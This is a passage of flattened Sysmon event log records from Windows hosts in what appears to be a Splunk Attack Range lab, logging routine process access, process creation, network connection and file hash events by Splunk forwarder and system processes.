Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.640{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC718D2D2A2F3FDF0EF00B6D5A646B07,SHA256=711CF998E5DF88030A38E3B57DB28B2976716858D029F2F85D4E7D5A52A754D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A6304C86D5322FD207EFDECE9048403,SHA256=C7B91771A0F51506D2A355FFE84DF7A2894DCB87505AE95C0F7E88FF97ACA050,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEAC0A9473D00E9F55DC0AACC1101EA8,SHA256=FB335687061CC4178894ACB78AD9E0FA9F01597F14E107C4A44EBBF29A1F8CF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.273{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57471-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.655{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC718D2D2A2F3FDF0EF00B6D5A646B07,SHA256=711CF998E5DF88030A38E3B57DB28B2976716858D029F2F85D4E7D5A52A754D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C457CC3BFF8BEE60CCD0B8585195F5,SHA256=DE14FFD8D0DAC8FA215D771CBDA0C541D52FCFD64D60AEC4B3605DC160EA64B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.646{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61978-false10.0.1.12-8000- 23542300x80000000000000001054930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:26.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087508AC0FF4BF670814C271BCDAF843,SHA256=6E9D735FAC410F586C87CF30927715C3EB8FCD964C0BAE257D30CF317A84BF5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.328{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 